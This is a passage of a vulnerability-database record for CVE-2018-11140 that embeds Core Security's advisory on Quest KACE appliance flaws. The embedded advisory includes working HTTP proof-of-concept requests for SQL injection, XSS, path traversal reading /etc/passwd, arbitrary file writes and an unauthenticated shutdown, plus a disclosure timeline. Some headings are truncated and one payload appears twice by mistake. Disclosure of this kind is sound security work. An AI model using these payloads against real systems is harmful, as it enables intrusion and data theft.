\u0027kace_support\u0027 account, which\ncomes disabled by default but has full sudo privileges. \n\n7.5. *Privilege escalation via command injection in Sudo Server*\n\n[CVE-2018-11132]\nAs mentioned in the issue [7.4], in order to perform actions that require\nhigher privileges, the application relies on a message queue that runs\ndaemonized with root privileges and only allows a set of commands to be\nexecuted. \n\nA command injection vulnerability exists within this message queue which\nallows us to append arbitrary commands that will be run as root. \n\n7.6. *Insufficient Authorization for critical function*\n\n[CVE-2018-11142]\n\u0027systemui/settings_network.php\u0027 and \u0027systemui/settings_patching.php\u0027\nscripts are accessible only from localhost. This restriction can be bypassed\nby modifying the \u0027Host\u0027 and \u0027X_Forwarded_For\u0027 HTTP headers. \n\nThe following proof of concept abuses this vulnerability to shutdown the\nserver as an anonymous user:\n\n/-----\nPOST /systemui/settings_network.php HTTP/1.1\nHost: localhost\nX-Forwarded-For: ::1\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIp]/systemui/settings_network.php\nContent-Type: multipart/form-data;\nboundary=---------------------------5642543667001619951434940129\nContent-Length: 3418\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"$shutdown\"\nDoIt!\nContent-Disposition: form-data; name=\"save\"\nSave\n-----------------------------5642543667001619951434940129--\n-----/\n\n7.7. In particular, a blind\ntime based type. \n\nThe following proof of concept induces a time delay:\n\n/-----\nhttp://[ServerIP]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1\nAND SLEEP(10)%23;\u0026version=8.0.152\n-----/\n\n7.8. In particular, an error based\ntype. \n\nThe following proof of concept retrieves the current database name:\n\n/-----\nPOST /common/run_report.php HTTP/1.1\nContent-Length: 161\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nHost: [ServerIP]\nAccept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8\nConnection: close\nReferer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID=\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nCookie: [Cookie]\n\ndate=1516135247598\u0026reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx\u0026reportName=\u0026format=pdf\n-----/\n\n/-----\nHTTP/1.1 200 OK\nDate: Thu, 08 Feb 2018 21:50:21 GMT\nServer: Apache\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0,\npre-check=0\nPragma: no-cache\nVary: Accept-Encoding\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: [ServerIP]\nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: [ServerIP]\nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: [ServerIP]\nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nContent-Length: 3548\nConnection: close\nContent-Type: text/html; charset=utf-8\n\n[...SNIPPED...]\n\u003cscript type=\"text/javascript\"\nsrc=\"/common/js/vendor/html5.js?BUILD=318\" /\u003e\u003c/script\u003e\n\u003c![endif]--\u003e\u003ctitle\u003eReport Queued: qppjqORG1qjpqq\u003c/title\u003e\u003cmeta\nhttp-equiv=\u0027refresh\u0027\n[...SNIPPED...]\n-----/\n\n7.9. *Unauthenticated Cross Site Scriting in run_cross_report.php*\n\n[CVE-2018-11133]\nThe \u0027fmt\u0027 parameter of the \u0027/common/run_cross_report.php\u0027 script is\nvulnerable to cross-site scripting. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\n7.10. *Path traversal in download_attachment.php leading to arbitrary\nfile read*\n\n[CVE-2018-11137]\nThe \u0027checksum\u0027 parameter of the \u0027/common/download_attachment.php\u0027 script can\nbe abused to read arbitrary files with \u0027www\u0027 privileges. The following proof\nof concept reads the \u0027/etc/passwd\u0027 file. No administrator privileges are\nneeded to execute this script. \n\nIt is worth noting that there are several interesting files that can be\nread with \u0027www\u0027 privileges, such as all the files located in\n\u0027/kbox/bin/koneas/keys/\u0027 and \u0027/kbox/kboxwww/include/globals.inc\u0027,\nwhich contain plaintext passwords. \n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd\u0026filename=\nHTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nHTTP/1.1 200 OK\nDate: Thu, 18 Jan 2018 17:18:19 GMT\nServer: Apache\nCache-Control: must-revalidate, post-check=0, pre-check=0\nExpires: -1\nPragma: public\nContent-Disposition: attachment; filename=\"\"\nContent-Transfer-Encoding: Binary\nContent-Description: K1000 attachment\nContent-Length: 2400\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: k10000. \nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: k10000. \nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: k10000. \nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nConnection: close\nContent-Type: application/octet-stream\n\n# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $\n#\nroot:*:0:0:Charlie \u0026:/root:/bin/csh\ndaemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin\noperator:*:2:5:System \u0026:/:/usr/sbin/nologin\nbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin\ntty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...]\n-----/\n\n7.11. *Path traversal in advisory.php leading to arbitrary file\ncreation/deletion*\n\n[CVE-2018-11141]\nThe \u0027IMAGES_JSON\u0027 and \u0027attachments_to_remove[]\u0027 parameters of the\n\u0027/adminui/advisory.php\u0027 script can be abused to write and delete files\nrespectively. The following proof of concept creates a file located at\n\u0027/kbox/kboxwww/resources/TestWrite\u0027 with the content \u0027Sarasa\u0027 (base64\nencoded). \nFiles can be at any location where the \u0027www\u0027 user has write permissions. \n\nFile deletion could be abused to delete\n\u0027/kbox/kboxwww/systemui/reports/setup_completed.log\u0027 file. This file\u0027s\nexistence defines if the appliance setup wizard is shown or not. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nPOST /adminui/advisory.php?ID=10 HTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIP]/adminui/advisory.php?ID=10\nContent-Type: multipart/form-data;\nboundary=---------------------------2671551246366368501556269100\nContent-Length: 1705\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n\n99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"IMAGES_JSON\"\n\n{\"/../../../resources/TestWrite\":\"aaaaaa,VGVzdENvbnRlbnQ=\"}\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"FARRAY[ID]\"\n[...SNIPPED...]\n-----/\n\nTaking advantage of 7.2 and 7.4 we are able to verify the file creation:\n\n/-----\n[root@k10000 /kbox/kboxwww/resources]# ls -lha\ntotal 32\ndrwxr-xr-x 2 www wheel 512B Feb 9 20:40 . \ndrwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. \n-rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite\n-----/\n\n8. *Report Timeline*\n2018-02-26: Core Security (Core) sent an initial notification to Quest\nSoftware Inc. (Quest) via web form. \n2018-03-05: Quest Support confirmed the receipt and requested additional\ninformation. \n2018-03-12: Core Security sent a draft advisory including a technical\ndescription. \n2018-03-16: Quest Support asked for the CVE-IDs. \n2018-03-16: Core Security answered saying that the CVE-IDs are required\nonce the vendor verifies the vulnerabilities. Additionally, Core Security\nrequested a confirmation about the reported vulnerabilities and a tentative\ntimescale to fix them. Finally, Core Security requested that Quest use\nCore\u0027s advisories-publication email address as the official communication\nhannel also copying the researchers behind this discovery. \n2018-03-16: Quest Support thanked Core\u0027s reply and stated it will be in\ntouch during the process. \n2018-03-20: Quest Support informed that they had not yet received any\nupdates from the engineering team and had requested one. \n2018-03-21: Quest Support requested information about the KACE version\nused for reporting the issues and also Core\u0027s company name and information. \n2018-03-21: Core replied with the affected version (that was included in\nthe original draft advisory) and a link to the Core company website and\nthe list of previous security advisories. \n2018-03-21: Quest Support acknowledged the information provided. \n2018-03-26: Quest\u0027s KACE product manager (PM) thanked Core for making it\naware of the security issues found and the level of thoroughness and details\nprovided. Quest specified it had fixes already in place for some of the\nissues. Quest\u0027s KACE PM asked for a conference call in order to understand\nmore about Core\u0027s offerings for future engagements. Finally, Quest\u0027s KACE\nPM notified the work done by Core is in breach of its license agreement,\nand requested Core not to distribute the findings to the public, otherwise\nuest would take legal action. \n2018-04-13: Quest\u0027s KACE PM sent a follow up email and informed that it\nmade a hotfix to patch the reported vulnerabilities. Quest also requested\na call meeting to understand future opportunities based on the Core\u0027s\ncompany capabilities. Finally, Quest asked for information about the\nresearcher that found the vulnerabilities and a link of Core\u0027s choosing\nin order to be included in Quest\u0027s Acknowledgment page\n(https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). \n2018-04-16: Core answered email from 2018-03-26 stating the company is\nfollowing standard practices with regards to coordinated vulnerability\ndisclosure, and also sent detailed technical information about our findings\nat Quest\u0027s request. Core also mentioned Quest seems to be well versed in\nthe disclosure process and expects vendors to coordinate with it prior to\npublication via Quest\u0027s vulnerability reporting process, and that Quest\u0027s\nlegal threat appears to be in direct contradiction to the disclosure\nprocess that they encourage on their website. Finally, Core asked about\nQuest\u0027s intention to work collaboratively to address these vulnerabilities\nand to follow industry standard disclosure processes that involves\npublication of the vulnerabilities. \n2018-04-17: Quest\u0027s KACE PM replied saying it is willing to collaborate\nand is looking forward to having a conversation over the phone in order to\ncontinue the next steps in its vulnerability process (forwarded email from\n2018-04-13). \n2018-04-17: Core thanked the answer and stated the willingness of keeping\nwritten communications between parties in order to better document the\nprocess and communicated the next steps of the process including: 1. Testing\nthe fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor\u0027s link to be\nincluded in the advisory and finally 4. Send final advisory version to\nvendor and coordinate publication date together. With regards to Quest\u0027s\nrequests, Core provided the researchers names and URL of the advisory when\nit will be published. Finally, Core stated that the request for other Core\ncompany services could be forwarded to the Core services team if needed\n(and asked the right contact at Quest) but our intention is to keep that\nservices request separate from the coordinated disclosure process. \n2018-04-18: Quest Support informed that they had publicly made available\npatches for its customers and unilaterally closed the case. \n2018-05-31: Advisory CORE-2018-0004 published. \n\n9. *References*\n\n[1] https://www.quest.com/products/kace-systems-management-appliance/\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security, is charged with anticipating\nthe future needs and requirements for information security technologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber-attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at:\nhttp://corelabs.coresecurity.com. \n\n11. *About Core Security*\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The company\u0027s\nthreat-aware, identity amp; access, network security, and vulnerability\nmanagement solutions provide actionable insight and context needed to\nmanage security risks across the enterprise. This shared insight gives\ncustomers a comprehensive view of their security posture to make better\nsecurity remediation decisions. Better insight allows organizations to\nprioritize their efforts to protect critical assets, take action sooner\nto mitigate access risk, and react faster if a breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2018 Core Security and (c)\n2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nadvisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11140"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005571"
},
{
"db": "CNVD",
"id": "CNVD-2018-15386"
},
{
"db": "VULMON",
"id": "CVE-2018-11140"
},
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-11140",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005571",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-15386",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1214",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "148005",
"trust": 0.2
},
{
"db": "VULMON",
"id": "CVE-2018-11140",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15386"
},
{
"db": "VULMON",
"id": "CVE-2018-11140"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005571"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11140"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1214"
}
]
},
"id": "VAR-201805-0600",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15386"
}
],
"trust": 1.1800866
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15386"
}
]
},
"last_update_date": "2023-12-18T12:01:57.580000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "KACE Systems Management Appliance",
"trust": 0.8,
"url": "https://www.quest.com/jp-ja/products/kace-systems-management-appliance/"
},
{
"title": "Patch for QuestKACESystemManagementApplianceSQL Injection Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/137459"
},
{
"title": "Quest KACE System Management Appliance SQL Repair measures for injecting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81226"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15386"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005571"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1214"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005571"
},
{
"db": "NVD",
"id": "CVE-2018-11140"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11140"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-11140"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/89.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/148005/quest-kace-system-management-appliance-8.0-build-8.0.318-xss-traversal-code-execution-sql-injection.html"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11139"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11134"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1"
},
{
"trust": 0.1,
"url": "http://[serverip]/systemui/settings_network.php"
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/reporting-security-vulnerability."
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/advisory.php?id=10"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11136"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11135"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11132"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11133"
},
{
"trust": 0.1,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/vulnerability-reporting-acknowledgements)."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11141"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11142"
},
{
"trust": 0.1,
"url": "https://support.quest.com/download-install-detail/6086148."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11138"
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/analysis_report_list.php?category_id="
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11137"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/run_cross_report.php?uniqueid=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952"
},
{
"trust": 0.1,
"url": "https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15386"
},
{
"db": "VULMON",
"id": "CVE-2018-11140"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005571"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11140"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1214"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-15386"
},
{
"db": "VULMON",
"id": "CVE-2018-11140"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005571"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11140"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1214"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-08-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-15386"
},
{
"date": "2018-05-31T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11140"
},
{
"date": "2018-07-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005571"
},
{
"date": "2018-05-31T20:52:06",
"db": "PACKETSTORM",
"id": "148005"
},
{
"date": "2018-05-31T18:29:00.637000",
"db": "NVD",
"id": "CVE-2018-11140"
},
{
"date": "2018-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1214"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-08-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-15386"
},
{
"date": "2018-07-02T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11140"
},
{
"date": "2018-07-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005571"
},
{
"date": "2018-07-02T15:51:15.810000",
"db": "NVD",
"id": "CVE-2018-11140"
},
{
"date": "2018-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1214"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1214"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Quest KACE System Management Appliance SQL Injection Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15386"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1214"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-1214"
}
],
"trust": 0.6
}
}